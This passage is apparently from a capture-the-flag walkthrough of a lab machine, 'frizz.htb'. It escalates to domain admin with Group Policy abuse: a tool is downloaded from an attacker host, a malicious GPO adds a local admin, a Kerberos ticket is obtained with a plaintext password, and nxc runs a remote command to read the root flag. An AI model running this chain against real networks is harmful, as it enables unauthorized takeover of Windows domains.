Next let’s transfer this exe file over.
- Start a python file server:
1 2
python3 -m http.server Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
- Download the Binary
1 2 3 4
PS C:\Users\M.SchoolBus> curl.exe http://10.10.14.6/SharpGPOAbuse.exe -O % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 80896 100 80896 0 0 63487 0 0:00:01 0:00:01 --:--:-- 63447
Next let’s create a new GPO
1
2
3
4
5
6
7
8
PS C:\Users\M.SchoolBus> New-GPO -Name pwned -Comment "pwned!" | New-GPLink -Target "DC=FRIZZ,DC=HTB" -LinkEnabled Yes
GpoId : 3517e6eb-b63e-4f98-8cd2-cca7cf29e45e
DisplayName : pwned
Enabled : True
Enforced : False
Target : DC=frizz,DC=htb
Order : 2
Next let’s make f.frizzle a local admin of that GPO
1
2
3
4
5
6
7
8
9
10
11
PS C:\Users\M.SchoolBus> ./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount f.frizzle --GPOName "pwned"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of f.frizzle = S-1-5-21-2386970044-1145388522-2932701813-1103
[+] GUID of "pwned" is: {FF20811C-EA41-4334-ACCD-D5165CB24F62}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{FF20811C-EA41-4334-ACCD-D5165CB24F62}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
Let’s update our group policy rules
1
2
3
4
5
PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Let’s grab a new TGT for f.frizzle
1
2
3
4
impacket-getTGT 'frizz.htb/f.frizzle:Jenni_Luvs_Magic23'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
Unfortunately the SSHd config denies Administrator remoting, However we can still run command:
1
2
3
4
5
nxc smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k -x 'type C:\Users\Administrator\Desktop\root.txt'
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 (Pwn3d!)
SMB frizzdc.frizz.htb 445 frizzdc [+] Executed command via wmiexec
SMB frizzdc.frizz.htb 445 frizzdc a15e9d402e...